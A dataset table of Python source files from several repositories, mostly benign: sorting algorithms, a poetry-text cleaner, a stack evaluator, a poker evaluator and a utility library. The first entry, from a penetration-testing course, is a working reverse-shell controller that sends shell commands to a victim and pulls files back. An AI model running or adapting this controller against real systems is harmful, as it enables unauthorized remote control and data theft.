blob_id string | repo_name string | path string | length_bytes int64 | score float64 | int_score int64 | text string |
|---|---|---|---|---|---|---|
0b66c882cb4dd7770977952cd2e27984be13f729 | yosef8234/test | /python_offsec_pentest/Module 2/Data Exfiltration Server- TCP Reverse Shell.py | 2,110 | 3.84375 | 4 | # Python For Offensive PenTest: A Complete Practical Course By Hussam Khrais - All rights reserved
# Follow me on LinkedIn https://jo.linkedin.com/in/python2
import socket
import os # Needed for file operation
# In the transfer function, we first create a trivial file called "test.png" as a file holder just to hold the
# received bytes , then we go into infinite loop and store the received data into our file holder "test.png", however
# If the requested file doesn't exist or if we reached the end of the file then we will break the loop
# note that we could know the end of the file, if we received the "DONE" tag from the target side
# Keep in mind that you can enhance the code and dynamically change the test.png to other file extension based on the user input
def transfer(conn,command):
conn.send(command)
f = open('/root/Desktop/test.png','wb')
while True:
bits = conn.recv(1024)
if 'Unable to find out the file' in bits:
print '[-] Unable to find out the file'
break
if bits.endswith('DONE'):
print '[+] Transfer completed '
f.close()
break
f.write(bits)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
command = raw_input("Shell> ")
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
# if we received grab keyword from the user input, then this is an indicator for
# file transfer operation, hence we will call transfer function
# Remember the Formula is grab*<File Path>
# Example: grab*C:\Users\Hussam\Desktop\photo.jpeg
elif 'grab' in command:
transfer(conn,command)
else:
conn.send(command)
print conn.recv(1024)
def main ():
connect()
main()
|
6ee2229642cfb4fb509764e591cd25108c8efa3e | luciopalm/Exerciciospython_C_video | /pacote download/exercícios/ex008.py | 120 | 3.578125 | 4 | n1 = int(input('Digite um valor:'))
print('metros:{} \ncentímetros:{} \nmilímetros:{}'.format(n1,(n1*100),(n1*1000)))
|
3c63ed3368a4a71fcf9615329a3795c67e3f0c11 | obezpalko/smallprogs | /covid-distance/main.py | 428 | 3.625 | 4 | #!/usr/bin/en python
from math import sqrt
from scipy.spatial import distance
a = (0, 0, 0)
b = (1, 0, 0)
c = (1/2, sqrt(3)/2, 0)
d = (1/2, 1/(2*sqrt(3)), -sqrt(2/3))
print(f"a->b: {distance.euclidean(a, b)}")
print(f"a->c: {distance.euclidean(a, c)}")
print(f"a->d: {distance.euclidean(a, d)}")
print(f"b->c: {distance.euclidean(b, c)}")
print(f"b->d: {distance.euclidean(b, d)}")
print(f"c->d: {distance.euclidean(c, d)}")
|
fbbace29d9e830d1312cb1c3721faa88b5c40b07 | tashakim/puzzles_python | /graph/sort.py | 4,683 | 4.34375 | 4 | #!/usr/bin/python3
class InvalidInputException(Exception):
def __init__(self,value):
self.value = value
def __str__(self):
return repr(self.value)
def merge_sort(array):
"""merge_sort: int array -> int array
Purpose: Sort the input array of integers in descending order
using the merge sort algorithm.
Examples: merge_sort([4,5,1,3,2]) -> [5,4,3,2,1]
merge_sort([1,2,4]) -> [4,2,1]
Throws: InvalidInputException if list is None.
This algorithm runs in worst case O(n log(n)) time.
"""
checkValidInput(array)
n = len(array)
if n > 1:
# divides array into left and right subarrays
left = array[:n//2]
right = array[n//2:]
merge_sort(left)
merge_sort(right)
i = j = k = 0
while i < len(left) and j < len(right):
if left[i] > right[j]:
array[k] = left[i]
i += 1
else:
array[k] = right[j]
j += 1
k += 1
while i < len(left):
array[k] = left[i]
i += 1
k += 1
while j < len(right):
array[k] = right[j]
j += 1
k += 1
return array
# if size of array is 1 or less, returns the input array.
else:
return array
def quick_sort(array):
"""quick_sort: int array -> int array
Purpose: Sort the input array of integers in descending order
using the quicksort algorithm.
Examples: quick_sort([4,5,1,3,2]) -> [5,4,3,2,1]
quick_sort([1,2,4]) -> [4,2,1]
Throws: InvalidInputException if list is None
This algorithm runs in expected case O(n log(n)) time.
"""
checkValidInput(array)
# We define our 3 arrays
smaller = []
equal = []
larger = []
# if the length of our array is greater than 1
# we perform a sort
if len(array) > 1:
# Select our pivot. This doesn't have to be
# the first element of our array
pivot = array[0]
# recursively go through every element
# of the array passed in and sort appropriately
for number in array:
if number < pivot:
smaller.append(number)
if number == pivot:
equal.append(number)
if number > pivot:
larger.append(number)
# recursively call quicksort on gradually smaller and smaller
# arrays until we have a sorted list.
return quick_sort(larger) + equal + quick_sort(smaller)
else:
return array
def radix_sort(array):
"""radix_sort: int array -> int array
Purpose: Sort the input array of integers in descending order
using the radixsort algorithm.
Examples: radix_sort([4,5,1,3,2]) -> [5,4,3,2,1]
radix_sort([1,2,4]) -> [4,2,1]
Throws: InvalidInputException if list is None/
This algorithm runs in worst case O(dn) time, where
d is the number of digits in the largest number.
"""
checkValidInput(array)
if len(array)<=1:
return array
positive_array = list(filter((0).__lt__, array))
negative_array = list(filter((0).__gt__, array))
negative_array = [-x for x in negative_array]
arrs = [positive_array, negative_array]
for x in arrs:
if len(x) > 0:
max_element = max(x)
digit = 1
while max_element // digit > 0:
radixSortHelper(x, digit)
digit *= 10
negative_array = [-x for x in negative_array][::-1]
if (0 in array):
num = array.count(0)
return positive_array + [0]*num + negative_array
return positive_array + negative_array
def radixSortHelper(array, digit):
"""radixSortHalper: int array, int digit
Purpose: A helper method that is called by radix_sort()
method.
"""
n = len(array)
output = [0] * n
count = [0] * 10
for i in range(n):
index = array[i] // digit
count[index % 10] += 1
for i in range(1, 10):
count[i] += count[i - 1]
i = n - 1
while i >= 0:
index = array[i] // digit
output[count[index % 10] - 1] = array[i]
count[index % 10] -= 1
i -= 1
for i in range(n):
array[i] = output[n-i-1]
def checkValidInput(array):
"""checkValidInput: int array
Purpose: Throws InvalidInputException if the input
list is None, otherwise, does nothing.
"""
if array is None:
raise InvalidInputException('List cannot be empty')
return
|
7c6e4a2776ecb24c5ff6e2209471e6aea5765ffe | ghostlhq/Python-Data-mining-Tutorial | /Week-02/Example-02/全唐诗文本整理.py | 3,849 | 3.625 | 4 | """
全唐诗文本整理
Version: 0.1
Author: 长行
"""
import re
if __name__ == "__main__":
with open("全唐诗.txt", encoding="UTF-8") as file:
lines = file.readlines()
print("总行数:", len(lines))
poem_list = list()
reading = False # 启动标志(解决第1次识别到标题行写入的问题)
book_num = 0 # 卷编号
poem_num = 0 # 诗编号
title = None # 标题
author = "未知" # 作者
content = "" # 诗文内容
for line in lines:
# 数据清洗
line = line.replace("\n", "").replace(" ", "").replace(" ", "")
line = re.sub("卷[一二三四五六七八九十百]+", "", line)
line = re.sub("第[一二三四五六七八九十百]+卷", "", line)
# 跳过空行(包括数据清洗后为空行的行)
if len(line) == 0:
continue
# 跳过无实际内容的行:
if "知古斋主精校" in line or "版权所有" in line or "web@guoxue.com" in line:
continue
# 处理标题行的情况
if re.search("卷[0-9]+_[0-9]+", line):
# 将上一首诗添加到列表
if reading:
poem_list.append({
"卷编号": book_num,
"诗编号": poem_num,
"标题": title,
"作者": author,
"内容": content
})
print(book_num, poem_num, title, author, content)
else:
reading = True
# 标题行读取:卷编号和诗编号
if book_regex := re.search("(?<=卷)[0-9]+(?=_)", line):
book_num = int(book_regex.group()) # 读取卷编号
else:
book_num = 0
print("未识别卷编号")
if poem_regex := re.search("(?<=_)[0-9]+", line):
poem_num = int(poem_regex.group()) # 读取诗编号
else:
poem_num = 0
print("未识别诗编号")
# 标题行读取:标题
if title_regex := re.search("(?<=【)[^】]+(?=】)", line):
title = title_regex.group() # 读取标题
else:
title = None
print("未识别标题")
# 标题行读取:作者
line = re.sub("卷[0-9]+_[0-9]+", "", line)
line = re.sub("【[^】]+】", "", line)
if author_regex := re.search("[\u4e00-\u9fa5]+", line):
author = author_regex.group() # 如果作者名位于标题行,则为清除其他所有内容后剩余的中文
else:
author = "未知"
# 初始化诗文内容
content = ""
# 处理普通诗文行情况
else:
# 普通诗文行数据清洗
line = line.replace("¤", "。") # 将错误句号替换为标准句号
line = re.sub("(?<=[),。])[知古斋主]$", "", line) # 剔除校注者名称
if not re.search("[,。?!]", line):
if author == "未知" and content == "":
author_regex = re.search("[\u4e00-\u9fa5]+", line)
author = author_regex.group()
else:
content += line
poem_list.append({
"卷编号": book_num,
"诗编号": poem_num,
"标题": title,
"作者": author,
"内容": content
})
# 将清洗后的全唐诗输出到文件
with open("全唐诗(清洗后).txt", "w+", encoding="UTF-8") as file:
for poem_item in poem_list:
file.write(",".join([str(poem_item["卷编号"]), str(poem_item["诗编号"]), poem_item["标题"], poem_item["作者"],
poem_item["内容"]]) + "\n")
|
d020cc3833470a58875df9cbf74b6598138bb2ae | despo/learn_python_the_hard_way | /exercises/ex33.py | 497 | 4.21875 | 4 | def add_numbers_to_list(size, increment=1):
numbers = range(0,size)
for i in numbers:
print "At the top is %d" % i
print "At the bottom i is %d" % i
def print_numbers():
print "The numbers:"
for num in numbers:
print num
# extra credit 2
numbers = []
add_numbers_to_list(6)
print_numbers()
numbers = []
add_numbers_to_list(3)
print_numbers()
# extra credit 4
numbers = []
add_numbers_to_list(3, 2)
print_numbers()
numbers = []
add_numbers_to_list(15, 3)
print_numbers()
|
9cf7ab1a716af574f531f6b9c4f8f9f21989209c | timebird7/Solve_Problem | /SWEA/4874_Forth.py | 1,455 | 3.671875 | 4 | class Stack:
def __init__(self):
self.stack = [0]*300
self.pnt = 0
def push(self, x):
self.stack[self.pnt] = x
self.pnt += 1
def pop(self):
if self.pnt == 0:
return None
else:
self.pnt -= 1
return self.stack[self.pnt]
def isEmpty(self):
return self.pnt == 0
def peek(self):
if self.pnt == 0:
return None
else:
return self.stack[self.pnt-1]
TC = int(input())
for tc in range(TC):
forth = input().split()
stack = Stack()
for c in forth:
if c == '+' and stack.pnt >= 2:
a = stack.pop()
b = stack.pop()
stack.push(b+a)
elif c == '-' and stack.pnt >= 2:
a = stack.pop()
b = stack.pop()
stack.push(b-a)
elif c == '*' and stack.pnt >= 2:
a = stack.pop()
b = stack.pop()
stack.push(b*a)
elif c == '/' and stack.pnt >= 2:
a = stack.pop()
b = stack.pop()
stack.push(b//a)
elif c == '.':
if stack.pnt == 1:
break
else:
stack.push('error')
elif stack.pnt < 2 and (c == '+' or c == '-' or c == '*' or c == '/'):
stack.push('error')
break
else:
stack.push(int(c))
print(f'#{tc+1} {stack.peek()}')
|
c538ea089503a8eca4018706238e45ee2e6940ee | LizaShengelia/100-Days-of-Code--Python | /Day2.Exercise3.py | 197 | 3.5625 | 4 | age = input("What is your current age?")
new_age = 90 - int(age)
x = int(new_age) * 365
y = int(new_age) * 52
z = int(new_age) * 12
print(f"You have {x} days, {y} weeks, and {z} months left.")
|
def2342ed42fc6faab47d28a12c56fed4dbe3714 | bweiz/Python | /PokerHands.py | 2,396 | 3.984375 | 4 | #-------------------------------------------------------------
# Benton Weizenegger
# 10/3/17
# Lab Section 2
# Program 2
#-------------------------------------------------------------
def evaluate(hand, poker_output):
if Flush(hand):
return "Flush"
elif Three_of_a_Kind(hand):
return "Three of a kind"
elif Two_of_a_Kind(hand):
return "Two of a Kind"
elif Nothing(hand):
return "Nothing"
def Flush(hand):
if hand[0][1] == hand[1][1] == hand[2][1]:
return True
def Three_of_a_Kind(hand):
if hand[0][0] == hand[1][0] == hand[2][0]:
return True
def Two_of_a_Kind(hand):
if hand[0][0] == hand[1][0] or hand[0][0] == hand[2][0] or hand[1][0] == hand[2][0]:
return True
def Nothing(hand):
if not hand[0][1] == hand[1][1] == hand[2][1]:
return True
if not hand[0][0] == hand[1][0] == hand[2][0]:
return True
if not hand[0][0] == hand[1][0] or hand[0][0] == hand[2][0] or hand[1][0] == hand[2][0]:
return True
def print_hand(hand_as_list, poker_output):
cardnum = 1 # Number to print in output function
poker_output.write("Poker Hand \n" + "---------- \n")
for hand in hand_as_list:
poker_output.write("Card " + str(cardnum) + ": " + hand[0] + " of " + hand[1] + "\n")
hand = hand_as_list[0][0:], hand_as_list[1][0:], hand_as_list[2][0:]
cardnum += 1
poker_output.write("\n")
poker_output.write("Poker hand Evaluation: " + str(evaluate(hand, poker_output)) + "\n")
poker_output.write("\n")
# --------------------------------------
# Do not change anything below this line
# --------------------------------------
def main(poker_input, poker_output, cards_in_hand):
for hand in poker_input:
hand = hand.split()
hand_as_list = []
for i in range(cards_in_hand):
hand_as_list.append([hand[0], hand[1]])
hand = hand[2:]
print_hand(hand_as_list, poker_output)
evaluate(hand_as_list, poker_output)
# --------------------------------------
poker_input = open("poker.in", "r")
poker_output = open("poker.out", "w")
main(poker_input, poker_output, 3)
poker_input.close()
poker_output.close()
|
d579936f20417376bf36e190a77a43eff309ec9c | aCoffeeYin/pyreco | /repoData/DasIch-brownie/allPythonContent.py | 251,289 | 3.515625 | 4 | __FILENAME__ = abstract
# coding: utf-8
"""
brownie.abstract
~~~~~~~~~~~~~~~~
Utilities to deal with abstract base classes.
.. versionadded:: 0.2
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
try:
from abc import ABCMeta
except ImportError:
class ABCMeta(type):
"""Dummy :class:`abc.ABCMeta` implementation which does nothing."""
def register(self, subclass):
pass
class VirtualSubclassMeta(type):
"""
A metaclass which allows you to easily define abstract super classes,
simply inherit from this metaclass and set the
:attr:`virtual_superclasses` attribute to an iterable:
>>> from brownie.abstract import ABCMeta, VirtualSubclassMeta
>>>
>>> class VirtualBaseClass(object):
... __metaclass__ = ABCMeta
>>>
>>> class VirtualSubclass(object):
... __metaclass__ = VirtualSubclassMeta
...
... virtual_superclasses = (VirtualBaseClass, )
>>>
>>> issubclass(VirtualSubclass, VirtualBaseClass)
True
"""
def __init__(self, name, bases, attributes):
type.__init__(self, name, bases, attributes)
self._register_superclasses(attributes.get('virtual_superclasses', ()))
def _register_superclasses(self, superclasses):
for cls in superclasses:
if isinstance(cls, ABCMeta):
cls.register(self)
if hasattr(cls, 'virtual_superclasses'):
self._register_superclasses(cls.virtual_superclasses)
class AbstractClassMeta(ABCMeta, VirtualSubclassMeta):
"""
A metaclass for abstract base classes which are also virtual subclasses.
Simply set :attr:`virtual_subclasses` to an iterable of classes your class
is supposed to virtually inherit from:
>>> from brownie.abstract import ABCMeta, AbstractClassMeta, \\
... VirtualSubclassMeta
>>> class Foo(object):
... __metaclass__ = ABCMeta
>>>
>>> class Bar(object):
... __metaclass__ = AbstractClassMeta
...
... virtual_superclasses = (Foo, )
>>>
>>> class Baz(object):
... __metaclass__ = VirtualSubclassMeta
...
... virtual_superclasses = (Bar, )
>>>
>>> issubclass(Baz, Foo)
True
>>> issubclass(Baz, Bar)
True
.. note::
All classes could use :class:`AbstractClassMeta` as `__metaclass__`
and the result would be the same, the usage here is just to demonstrate
the specific problem which is solved.
"""
__all__ = ['ABCMeta', 'VirtualSubclassMeta', 'AbstractClassMeta']
########NEW FILE########
__FILENAME__ = caching
# coding: utf-8
"""
brownie.caching
~~~~~~~~~~~~~~~
Caching utilities.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from functools import wraps
from brownie.datastructures import OrderedDict, Counter, missing
class cached_property(object):
"""
Property which caches the result of the given `getter`.
:param doc: Optional docstring which is used instead of the `getter`\s
docstring.
"""
def __init__(self, getter, doc=None):
self.getter = getter
self.__module__ = getter.__module__
self.__name__ = getter.__name__
self.__doc__ = doc or getter.__doc__
def __get__(self, obj, type=None):
if obj is None:
return self
value = obj.__dict__[self.__name__] = self.getter(obj)
return value
class CacheBase(object):
"""
Base class for all caches, which is supposed to be used as a mixin.
"""
@classmethod
def decorate(cls, maxsize=float('inf')):
"""
Returns a decorator which can be used to create functions whose
results are cached.
In order to clear the cache of the decorated function call `.clear()`
on it.
::
@CacheBase.decorate(maxsize=1024) # items stored in the cache
def foo(a, b):
return a + b # imagine a very expensive operation here
"""
def decorator(function, _maxsize=maxsize):
cache = cls(maxsize=maxsize)
@wraps(function)
def wrapper(*args, **kwargs):
key = args
if kwargs:
key += tuple(sorted(kwargs.iteritems()))
try:
result = cache[key]
except KeyError:
result = function(*args, **kwargs)
cache[key] = result
return result
wrapper.clear = cache.clear
return wrapper
return decorator
class LRUCache(OrderedDict, CacheBase):
"""
:class:`~brownie.datastructures.OrderedDict` based cache which removes the
least recently used item once `maxsize` is reached.
.. note:: The order of the dict is changed each time you access the dict.
"""
def __init__(self, mapping=(), maxsize=float('inf')):
OrderedDict.__init__(self, mapping)
self.maxsize = maxsize
def __getitem__(self, key):
self.move_to_end(key)
return OrderedDict.__getitem__(self, key)
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.popitem(last=False)
OrderedDict.__setitem__(self, key, value)
def __repr__(self):
return '%s(%s, %f)' % (
self.__class__.__name__, dict.__repr__(self), self.maxsize
)
class LFUCache(dict, CacheBase):
"""
:class:`dict` based cache which removes the least frequently used item once
`maxsize` is reached.
"""
def __init__(self, mapping=(), maxsize=float('inf')):
dict.__init__(self, mapping)
self.maxsize = maxsize
self.usage_counter = Counter()
def __getitem__(self, key):
value = dict.__getitem__(self, key)
self.usage_counter[key] += 1
return value
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
for key, _ in self.usage_counter.most_common(len(self) - self.maxsize):
del self[key]
def __delitem__(self, key):
dict.__delitem__(self, key)
del self.usage_counter[key]
def pop(self, key, default=missing):
try:
value = self[key]
del self[key]
return value
except KeyError:
if default is missing:
raise
return default
def setdefault(self, key, default=None):
if key not in self:
self[key] = default
return self[key]
def popitem(self):
item = dict.__popitem__(self)
del self.usage_counter[item[0]]
return item
def __repr__(self):
return '%s(%s, %f)' % (
self.__class__.__name__, dict.__repr__(self), self.maxsize
)
#: A memoization decorator, which uses a simple dictionary of infinite size as
#: cache::
#:
#: @memoize
#: def foo(a, b):
#: return a + b
#:
#: .. versionadded:: 0.5
memoize = lambda func: type(
'_MemoizeCache', (dict, CacheBase), {}
).decorate()(func)
__all__ = ['cached_property', 'LRUCache', 'LFUCache', 'memoize']
########NEW FILE########
__FILENAME__ = context
# coding: utf-8
"""
brownie.context
~~~~~~~~~~~~~~~
Utilities to deal with context managers.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import thread
import threading
from operator import itemgetter
from itertools import count
from brownie.caching import LFUCache
def _make_stack_methods(name, lockname, stackname):
def push(self, obj):
"""
Pushes the given object onto the %s stack.
"""
with getattr(self, lockname):
self._add_object(getattr(self, stackname), obj)
self._cache.clear()
def pop(self):
"""
Pops and returns an object from the %s stack.
"""
with getattr(self, lockname):
stack = self._get_objects(getattr(self, stackname))
if stack is None:
raise RuntimeError('no objects on stack')
self._cache.clear()
return stack.pop()[1]
push.__name__ = 'push_' + name
push.__doc__ = push.__doc__ % name
pop.__name__ = 'pop_' + name
pop.__doc__ = pop.__doc__ % name
return push, pop
class ContextStackManagerBase(object):
"""
Helper which manages context dependant stacks.
A common API pattern is using context managers to change options; those
options are internally stored on a stack.
However larger applications have multiple execution contexts such as
processes, threads and/or coroutines/greenthreads and such an API becomes
a problem as each modification of the stack becomes visible to every
execution context.
This helper allows you to make stack operations local to the current
execution context, ensuring that the stack remains the same in other
contexts unless you want it to change there.
As applications tend to have very different requirements and use different
contexts each is implemented in a separate mixin, this way it easily
possible to create a `ContextStackManager` for your needs.
Assuming your application uses threads and eventlet for greenthreads you
would create a `ContextStackManager` like this::
class ContextStackManager(
ContextStackManagerEventletMixin,
ContextStackManagerThreadMixin,
ContextStackManagerBase
):
pass
Greenthreads are executed in a thread, whereas threads are executed in
the application thread (handled by the base class) this is why
`ContextStackManager` inherits from these classes exactly in this order.
Currently available mixins are:
- :class:`ContextStackManagerThreadMixin`
- :class:`ContextStackManagerEventletMixin`
"""
def __init__(self, _object_cache_maxsize=256):
self._application_stack = []
self._cache = LFUCache(maxsize=_object_cache_maxsize)
self._contexts = []
self._stackop = count().next
def _get_ident(self):
return ()
def _make_item(self, obj):
return self._stackop(), obj
def _get_objects(self, context):
return getattr(context, 'objects', None)
def _add_object(self, context, obj):
item = self._make_item(obj)
objects = self._get_objects(context)
if objects is None:
context.objects = [item]
else:
objects.append(item)
def iter_current_stack(self):
"""
Returns an iterator over the items in the 'current' stack, ordered
from top to bottom.
"""
ident = self._get_ident()
objects = self._cache.get(ident)
if objects is None:
objects = self._application_stack[:]
for context in self._contexts:
objects.extend(getattr(context, 'objects', ()))
objects.reverse()
self._cache[ident] = objects = map(itemgetter(1), objects)
return iter(objects)
def push_application(self, obj):
"""
Pushes the given object onto the application stack.
"""
self._application_stack.append(self._make_item(obj))
self._cache.clear()
def pop_application(self):
"""
Pops and returns an object from the application stack.
"""
if not self._application_stack:
raise RuntimeError('no objects on application stack')
self._cache.clear()
return self._application_stack.pop()[1]
class ContextStackManagerThreadMixin(object):
"""
A :class:`ContextStackManagerBase` mixin providing thread context support.
"""
def __init__(self, *args, **kwargs):
super(ContextStackManagerThreadMixin, self).__init__(*args, **kwargs)
self._thread_context = threading.local()
self._contexts.append(self._thread_context)
self._thread_lock = threading.Lock()
def _get_ident(self):
return super(
ContextStackManagerThreadMixin,
self
)._get_ident() + (thread.get_ident(), )
push_thread, pop_thread = _make_stack_methods(
'thread', '_thread_lock', '_thread_context'
)
class ContextStackManagerEventletMixin(object):
"""
A :class:`ContextStackManagerBase` mixin providing coroutine/greenthread
context support using eventlet_.
.. _eventlet: http://eventlet.net
"""
def __init__(self, *args, **kwargs):
super(ContextStackManagerEventletMixin, self).__init__(*args, **kwargs)
try:
from eventlet.corolocal import local
from eventlet.semaphore import BoundedSemaphore
except ImportError:
raise RuntimeError(
'the eventlet library is required for %s' %
self.__class__.__name__
)
self._coroutine_context = local()
self._contexts.append(self._coroutine_context)
self._coroutine_lock = BoundedSemaphore()
def _get_ident(self):
from eventlet.corolocal import get_ident
return super(
ContextStackManagerEventletMixin,
self
)._get_ident() + (get_ident(), )
push_coroutine, pop_coroutine = _make_stack_methods(
'coroutine', '_coroutine_lock', '_coroutine_context'
)
__all__ = [
'ContextStackManagerBase', 'ContextStackManagerThreadMixin',
'ContextStackManagerEventletMixin'
]
########NEW FILE########
__FILENAME__ = iterators
# coding: utf-8
"""
brownie.datastructures.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from collections import deque
class PeekableIterator(object):
"""
An iterator which allows peeking.
.. versionadded:: 0.6
"""
def __init__(self, iterable):
self.iterator = iter(iterable)
self.remaining = deque()
def next(self):
if self.remaining:
return self.remaining.popleft()
return self.iterator.next()
def peek(self, n=1):
"""
Returns the next `n` items without consuming the iterator, if the
iterator has less than `n` items these are returned.
Raises :exc:`ValueError` if `n` is lower than 1.
"""
if n < 1:
raise ValueError('n should be greater than 0')
items = list(self.remaining)[:n]
while len(items) < n:
try:
item = self.iterator.next()
except StopIteration:
break
items.append(item)
self.remaining.append(item)
return items
def __iter__(self):
return self
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.iterator)
__all__ = ['PeekableIterator']
########NEW FILE########
__FILENAME__ = mappings
# coding: utf-8
"""
brownie.datastructures.mappings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from heapq import nlargest
from operator import itemgetter
from itertools import izip, repeat, ifilter
from brownie.itools import chain, unique, starmap
from brownie.abstract import AbstractClassMeta
from brownie.datastructures import missing
def iter_multi_items(mapping):
"""
Iterates over the items of the given `mapping`.
If a key has multiple values a ``(key, value)`` item is yielded for each::
>>> for key, value in iter_multi_items({1: [2, 3]}):
... print key, value
1 2
1 3
>>> for key, value in iter_multi_items(MultiDict({1: [2, 3]})):
... print key, value
1 2
1 3
"""
if isinstance(mapping, MultiDict):
for item in mapping.iteritems(multi=False):
yield item
elif isinstance(mapping, dict):
for key, value in mapping.iteritems():
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
@classmethod
def raise_immutable(cls, *args, **kwargs):
raise TypeError('%r objects are immutable' % cls.__name__)
class ImmutableDictMixin(object):
@classmethod
def fromkeys(cls, keys, value=None):
return cls(zip(keys, repeat(value)))
__setitem__ = __delitem__ = setdefault = update = pop = popitem = clear = \
raise_immutable
def __repr__(self):
content = dict.__repr__(self) if self else ''
return '%s(%s)' % (self.__class__.__name__, content)
class ImmutableDict(ImmutableDictMixin, dict):
"""
An immutable :class:`dict`.
.. versionadded:: 0.5
:class:`ImmutableDict` is now hashable, given the content is.
"""
__metaclass__ = AbstractClassMeta
def __hash__(self):
return hash(tuple(self.items()))
class CombinedDictMixin(object):
@classmethod
def fromkeys(cls, keys, value=None):
raise TypeError('cannot create %r instances with .fromkeys()' %
cls.__class__.__name__
)
def __init__(self, dicts=None):
#: The list of combined dictionaries.
self.dicts = [] if dicts is None else list(dicts)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise KeyError(key)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def __iter__(self):
return unique(chain.from_iterable(d.iterkeys() for d in self.dicts))
iterkeys = __iter__
def itervalues(self):
for key in self:
yield self[key]
def iteritems(self):
for key in self:
yield key, self[key]
def keys(self):
return list(self.iterkeys())
def values(self):
return list(self.itervalues())
def items(self):
return list(self.iteritems())
def __len__(self):
return len(self.keys())
def __contains__(self, key):
return any(key in d for d in self.dicts)
has_key = __contains__
def __repr__(self):
content = repr(self.dicts) if self.dicts else ''
return '%s(%s)' % (self.__class__.__name__, content)
class CombinedDict(CombinedDictMixin, ImmutableDictMixin, dict):
"""
An immutable :class:`dict` which combines the given `dicts` into one.
You can use this class to combine dicts of any type, however different
interfaces as provided by e.g. :class:`MultiDict` or :class:`Counter` are
not supported, the same goes for additional keyword arguments.
.. versionadded:: 0.2
.. versionadded:: 0.5
:class:`CombinedDict` is now hashable, given the content is.
"""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (ImmutableDict, )
def __hash__(self):
return hash(tuple(self.dicts))
class MultiDictMixin(object):
def __init__(self, *args, **kwargs):
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
arg = []
if args:
mapping = args[0]
if isinstance(mapping, self.__class__):
arg = ((k, l[:]) for k, l in mapping.iterlists())
elif hasattr(mapping, 'iteritems'):
for key, value in mapping.iteritems():
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
arg.append((key, value))
else:
keys = []
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
keys.append(key)
arg = ((key, tmp[key]) for key in unique(keys))
kws = {}
for key, value in kwargs.iteritems():
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
kws[key] = value
super(MultiDictMixin, self).__init__(arg, **kws)
def __getitem__(self, key):
"""
Returns the first value associated with the given `key`. If no value
is found a :exc:`KeyError` is raised.
"""
return super(MultiDictMixin, self).__getitem__(key)[0]
def __setitem__(self, key, value):
"""
Sets the values associated with the given `key` to ``[value]``.
"""
super(MultiDictMixin, self).__setitem__(key, [value])
def get(self, key, default=None):
"""
Returns the first value associated with the given `key`, if there are
none the `default` is returned.
"""
try:
return self[key]
except KeyError:
return default
def add(self, key, value):
"""
Adds the `value` for the given `key`.
"""
super(MultiDictMixin, self).setdefault(key, []).append(value)
def getlist(self, key):
"""
Returns the :class:`list` of values for the given `key`. If there are
none an empty :class:`list` is returned.
"""
try:
return super(MultiDictMixin, self).__getitem__(key)
except KeyError:
return []
def setlist(self, key, values):
"""
Sets the values associated with the given `key` to the given `values`.
"""
super(MultiDictMixin, self).__setitem__(key, list(values))
def setdefault(self, key, default=None):
"""
Returns the value for the `key` if it is in the dict, otherwise returns
`default` and sets that value for the `key`.
"""
if key not in self:
MultiDictMixin.__setitem__(self, key, default)
else:
default = MultiDictMixin.__getitem__(self, key)
return default
def setlistdefault(self, key, default_list=None):
"""
Like :meth:`setdefault` but sets multiple values and returns the list
associated with the `key`.
"""
if key not in self:
default_list = list(default_list or (None, ))
MultiDictMixin.setlist(self, key, default_list)
else:
default_list = MultiDictMixin.getlist(self, key)
return default_list
def iteritems(self, multi=False):
"""Like :meth:`items` but returns an iterator."""
for key, values in super(MultiDictMixin, self).iteritems():
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def items(self, multi=False):
"""
Returns a :class:`list` of ``(key, value)`` pairs.
:param multi:
If ``True`` the returned :class:`list` will contain a pair for
every value associated with a key.
"""
return list(self.iteritems(multi))
def itervalues(self):
"""Like :meth:`values` but returns an iterator."""
for values in super(MultiDictMixin, self).itervalues():
yield values[0]
def values(self):
"""
Returns a :class:`list` with the first value of every key.
"""
return list(self.itervalues())
def iterlists(self):
"""Like :meth:`lists` but returns an iterator."""
for key, values in super(MultiDictMixin, self).iteritems():
yield key, list(values)
def lists(self):
"""
Returns a :class:`list` of ``(key, values)`` pairs, where `values` is
the list of values associated with the `key`.
"""
return list(self.iterlists())
def iterlistvalues(self):
"""Like :meth:`listvalues` but returns an iterator."""
return super(MultiDictMixin, self).itervalues()
def listvalues(self):
"""
Returns a :class:`list` of all values.
"""
return list(self.iterlistvalues())
def pop(self, key, default=missing):
"""
Returns the first value associated with the given `key` and removes
the item.
"""
value = super(MultiDictMixin, self).pop(key, default)
if value is missing:
raise KeyError(key)
elif value is default:
return default
return value[0]
def popitem(self, *args, **kwargs):
"""
Returns a key and the first associated value. The item is removed.
"""
key, values = super(MultiDictMixin, self).popitem(*args, **kwargs)
return key, values[0]
def poplist(self, key):
"""
Returns the :class:`list` of values associated with the given `key`,
if the `key` does not exist in the :class:`MultiDict` an empty list is
returned.
"""
return super(MultiDictMixin, self).pop(key, [])
def popitemlist(self):
"""Like :meth:`popitem` but returns all associated values."""
return super(MultiDictMixin, self).popitem()
